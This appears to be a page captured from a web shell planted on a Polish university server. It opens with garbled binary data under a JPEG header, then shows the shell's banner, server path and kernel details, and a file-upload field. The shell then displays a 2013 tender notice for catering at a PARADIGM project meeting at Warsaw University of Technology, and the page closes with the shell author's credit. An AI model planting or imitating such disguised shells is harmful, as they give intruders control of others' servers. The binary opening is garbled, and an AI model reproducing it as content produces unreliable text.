JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130528/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130528/92773-N-2013.html

<p class="kh_header"><b>Warszawa: Usługa cateringu w czasie spotkania projektu PARADIGM
Postępowanie nr WEITI/51/BZP/2013/1035</b><br>
<b>Numer ogłoszenia: 92773 - 2013; data zamieszczenia: 28.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Warszawska Wydział Elektroniki i Technik Informacyjnych , ul. Nowowiejska 15/19, 00-665 Warszawa, woj. mazowieckie, tel. 0-22 234 51 01, faks 0-22 234 58 97.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pw.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa cateringu w czasie spotkania projektu PARADIGM
Postępowanie nr WEITI/51/BZP/2013/1035.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługa cateringu w czasie spotkania projektu PARADIGM. 

1) Opis przedmiotu zamówienia:

Przedmiotem zamówienia jest usługa cateringu w czasie spotkania projektu PARADIGM odbywającego się w dniach 11-12 czerwca 2013 w Szkole Biznesu Politechniki Warszawskiej ul. Koszykowa 79, 02-008 Warszawa. 
http://www.biznes.edu.pl/centrum_konferencyjno_szkoleniowe.php
Dokładna liczba uczestników nie jest znana, przewiduje się że  spotkaniu może wziąć udział ok. 40 - 50 osób. 
Zamawiający przewiduje udzielenie zamówienia uzupełniającego w formie posiłków, napojów dla zwiększonej liczby uczestników.

Szkolenie będzie odbywać się w sali nr 205, przerwy kawowe mają być serwowane  w holu pod salą 205. 

Lunch będzie serwowany przez Wykonawcę w sali nr 101.
http://www.biznes.edu.pl/centrum_101.php
Wykonawca od godz. 12.00 do 13.00 musi przestawić stoliki i przygotować salę 101 na potrzeby lunchu. Między 14.00 a 15.00 Wykonawca musi przywrócić ustawienie stolików i zwolnić salę 101.


Pierwszy dzień:
Godz. 8.30-9.30 - I kawa powitalna
Napoje zimne:
- woda gazowana - 30 butelek po 0,5 litra
- woda niegazowana - 30 butelek po 0,5 litra
- sok pomarańczowy - 30 porcji po 200 ml w szklankach
- sok jabłkowy - 30 porcji po 200 ml w szklankach

Napoje ciepłe:
- kawa - rozpuszczalna w co najmniej dwóch pojemnikach po min. 5 litrów każdy
- mleczko do kawy w 3 dzbanuszkach po co najmniej 250 ml każdy
- herbata - czarna w torebkach - 30 szt.
- dwa pojemniki po min. 5 litrów każdy z gorącą wodą
- sok cytrynowy - 30 pojemniczków po 10 ml
- cukier w saszetkach - 80 opakowań po 5 gram

Ciasta:
- ciasteczka kruche, różne rodzaje, podane na talerzach deserowych lub tacach - łącznie 3
kg
- ciasta domowe, co najmniej 2 rodzaje, podawane w papilotach -50 porcji

Godz. 10.30-11.00 - I przerwa kawowa
Napoje zimne:
- woda gazowana - 30 butelek po 0,5 litra
- woda niegazowana - 30 butelek po 0,5 litra
- sok pomarańczowy - 30 porcji po 200 ml w szklankach
- sok jabłkowy - 30 porcji po 200 ml w szklankach

Napoje ciepłe:
- kawa - rozpuszczalna w co najmniej dwóch pojemnikach po min. 5 litrów każdy
- mleczko do kawy w 3 dzbanuszkach po co najmniej 250 ml każdy
- herbata - czarna w torebkach - 30 szt.
- dwa pojemniki po min. 5 litrów każdy z gorącą wodą
- sok cytrynowy - 20 pojemniczków po 10 ml
- cukier w saszetkach - 80 opakowań po 5 gram

Ciastka:
- małe pączki podane na talerzach deserowych lub tacach - 3 kg
- małe drożdżówki podane na talerzach deserowych lub tacach, co najmniej 2 rodzaje - 80 szt.

Godz. 13.00-14.00 - I lunch w formie bufetu szwedzkiego
Napoje zimne:
- woda gazowana - 30 butelek po 0,5 litra
- woda niegazowana - 30 butelek po 0,5 litra
- sok pomarańczowy - 30 porcji po 200 ml w szklankach
- sok jabłkowy - 30 porcji po 200 ml w szklankach

Napoje ciepłe:
- kawa - rozpuszczalna w co najmniej dwóch pojemnikach po min. 5 litrów każdy
- mleczko do kawy w 3 dzbanuszkach po co najmniej 250 ml każdy
- herbata - czarna w torebkach - 30 szt.
- dwa pojemniki po min. 5 litrów każdy z gorącą wodą
- sok cytrynowy - 20 pojemniczków po 10 ml
- cukier w saszetkach - 80 opakowań po 5 gram

Sałatki:
- sałatka z rukolą, marynowaną gruszką i parmezanem w sosie winegret - 30 porcji
- sałatka caprese - 30 porcji
- sałatka owocowa z dodatkiem pieczonego kurczaka - 30 porcji

Przekąski na zimno:
- pieczony łosoś podawany we włoskich ziołach - 30 porcji
- mozzarella z rukolą zawijane w szynkę westfalską - 30 porcji
- rożki schabowe z nadzieniem chrzanowo jajecznym - 30 porcji

Dania gorące:
- zapiekana sola w sosie winnym, ryż, warzywa gotowane - 30 porcji
- fileciki z kurczaka w czerwonej salsie, kopytka - 30 porcji
- pieprzowa karkówka w zalewie piwnej, opiekane ziemniaki, sałatka colesław - 30 porcji
- lasagne ze szpinakiem - 30 porcji

Desery:
- musy jogurtowo-owocowe podawane w pucharkach - 50 porcji
- owoce - 50 porcji
Godz. 15.30-16.00 - II przerwa kawowa
Napoje zimne:
- woda gazowana - 30 butelek po 0,5 litra
- woda niegazowana - 30 butelek po 0,5 litra
- sok pomarańczowy - 30 porcji po 200 ml w szklankach
- sok jabłkowy - 30 porcji po 200 ml w szklankach

Napoje ciepłe:
- kawa - rozpuszczalna w co najmniej dwóch pojemnikach po min. 5 litrów każdy
- mleczko do kawy w 3 dzbanuszkach po co najmniej 250 ml każdy
- herbata - czarna w torebkach - 30 szt.
- dwa pojemniki po min. 5 litrów każdy z gorącą wodą
- sok cytrynowy - 20 pojemniczków po 10 ml
- cukier w saszetkach - 80 opakowań po 5 gram

Ciasta:
- ciasteczka kruche, różne rodzaje, podane na talerzach deserowych lub tacach - łącznie 3 kg
- ciasta domowe, co najmniej 2 rodzaje podawane w papilotach - 50 porcji


Drugi dzień:

Godz. 8.30-9.30 - II kawa powitalna
Napoje zimne:
- woda gazowana - 30 butelek po 0,5 litra
- woda niegazowana - 30 butelek po 0,5 litra
- sok pomarańczowy - 30 porcji po 200 ml w szklankach
- sok jabłkowy - 30 porcji po 200 ml w szklankach

Napoje ciepłe:
- kawa - rozpuszczalna w co najmniej dwóch pojemnikach po min. 5 litrów każdy
- mleczko do kawy w 3 dzbanuszkach po co najmniej 250 ml każdy
- herbata - czarna w torebkach - 30 szt.
- dwa pojemniki po min. 5 litrów każdy z gorącą wodą
- sok cytrynowy - 30 pojemniczków po 10 ml
- cukier w saszetkach - 80 opakowań po 5 gram

Ciasta:
- ciasteczka kruche, różne rodzaje, podane na talerzach deserowych lub tacach - łącznie 3
kg
- ciasta domowe, co najmniej 2 rodzaje, podawane w papilotach -50 porcji

Godz. 10.30-11.15 - III przerwa kawowa
Napoje zimne:
- woda gazowana - 30 butelek po 0,5 litra
- woda niegazowana - 30 butelek po 0,5 litra
- sok pomarańczowy - 30 porcji po 200 ml w szklankach
- sok jabłkowy - 30 porcji po 200 ml w szklankach

Napoje ciepłe:
- kawa - rozpuszczalna w co najmniej dwóch pojemnikach po min. 5 litrów każdy
- mleczko do kawy w 3 dzbanuszkach po co najmniej 250 ml każdy
- herbata - czarna w torebkach - 30 szt.
- dwa pojemniki po min. 50 litrów każdy z gorącą wodą
- sok cytrynowy - 30 pojemniczków po 10 ml
- cukier w saszetkach - 80 opakowań po 5 gram

Ciastka:
- małe pączki podane na talerzach deserowych lub tacach - 3 kg
- ciasta domowe, co najmniej 2 rodzaje (inne niż pierwszego dnia) podawane w papilotach - 50 porcji

Godz. 13.00-14.00 - II lunch w formie bufetu szwedzkiego
Napoje zimne:
- woda gazowana - 30 butelek po 0,5 litra
- woda niegazowana - 30 butelek po 0,5 litra
- sok pomarańczowy - 30 porcji po 200 ml w szklankach
- sok jabłkowy - 30 porcji po 200 ml w szklankach

Napoje ciepłe:
- kawa - rozpuszczalna w co najmniej dwóch pojemnikach po min. 5 litrów każdy
- mleczko do kawy w 3 dzbanuszkach po co najmniej 250 ml każdy
- herbata - czarna w torebkach - 30 szt.
- dwa pojemniki po min. 5 litrów każdy z gorącą wodą
- sok cytrynowy - 30 pojemniczków po 10 ml
- cukier w saszetkach - 80 opakowań po 5 gram

Sałatki:
- sałatka grecka z serem typu feta - 30 porcji
- sałatka z rukolą, winogronami, serem kozim, tartym parmezanem, granatem, kaszą kuskus i miodowym sosem winegret  - 30 porcji
- sałatka szopska z solankowym serem owczym - 30 porcji

Przekąski na zimno:
- roladki z bakłażana z warzywami i kurczakiem - 30 porcji
- roladki z wędzonym łososiem, szpinakiem i serkiem śmietankowym - 30 porcji
- pierożki z ciasta francuskiego z mięsem i parmezanem - 30 porcji

Dania gorące:
- zrazy wołowe, ziemniaki puree, buraczki zasmażane - 30 porcji
- kotlet z kurczaka de volaille, ziemniaki opiekane/frytki, surówka, - 30 porcji
- łosoś pieczony, ryż, warzywa gotowane - 30 porcji
- cukinia faszerowana warzywami i serem feta (jarska) - 30 porcji

Desery:
- musy czekoladowe podawane w pucharkach - 50 porcji
- owoce  - 50 porcji
Dodatkowo Zamawiający wymaga podczas poczęstunków:
- zapewnienie wyposażenia w stoły przykryte obrusami
- zapewnienie serwisu w postaci serwetek, naczyń, sztućców, termosów, podgrzewaczy oraz
innych narzędzi i przedmiotów niezbędnych dla prawidłowego wykonania umowy
(Zamawiający nie dopuszcza użycia zastawy plastikowej oraz sztućców z tworzywa
sztucznego)
- zapewnienie utrzymania czystości podczas trwania imprezy i po jej zakończeniu
- zapewnienia obsługi niezbędnej do świadczenia usługi
- dostarczenia koszy na śmieci oraz wywiezienia śmieci po świadczeniu usługi.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówienia uzupełniającego w formie posiłków, napojów dla zwiększonej liczby uczestników.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.31.20.00-0, 55.32.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 11.06.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Ocena spełnienia warunków zostanie dokonana wg formuły spełnia - nie spełnia.   Ocena spełniania warunków udziału w postępowaniu będzie prowadzona 
na podstawie treści złożonych oświadczeń lub dokumentów wymaganych zgodnie rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane  (Dz. U. z 2009 r. Nr 226, poz. 1817).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1: Formularz Oferty wraz z opisem przedmiotu zamówienia .
2: Oświadczenie o wiedzy i doświadczeniu,  potencjale technicznym innych 
podmiotów sporządzone według wzoru zawartego w załączniku nr 4 do SIWZ.
3. W przypadku, gdy ofertę składa pełnomocnik wymagane jest
pełnomocnictwo do reprezentowania Wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany Umowy w następujących przypadkach::
a)	w zakresie przedmiotu zamówienia, jeżeli zmiany nie są istotne
w stosunku do treści oferty oraz są na korzyść Zamawiającego albo zaszły okoliczności których nie można było przewidzieć  chwili zawarcia Umowy, w szczególności:
- jeśli zaoferowany przedmiot zamówienia nie jest z przyczyn obiektywnych dostępny na rynku, wykonawca może zaoferować inny artykuł o parametrach nie gorszych niż złożone w ofercie i za cenę nie wyższą niż wskazana w ofercie.
b)	w zakresie terminu realizacji, jeżeli zaszły okoliczności, których nie można było przewidzieć w chwili zawarcia Umowy;
c)	Ustawowa zmiana procentowej stawki podatku VAT, będzie stanowiła podstawę do zmiany wynagrodzenia brutto i będzie odpowiednio dostosowana aneksem do niniejszej umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zamowienia.pw.edu.pl/wykaz/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych WEiTI PW, Gmach Elektroniki PW, ul. Nowowiejska 15/19, 00-665 Warszawa, pokój 101.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.06.2013 godzina 11:00, miejsce: Biuro Zamówień Publicznych WEiTI PW, Gmach Elektroniki PW, ul. Nowowiejska 15/19, 00-665 Warszawa, pokój 101.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt PARADIGM Zaawansowane badania nad rozwojem generycznych technologii fotonicznych układów scalonych - 7 Program Ramowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com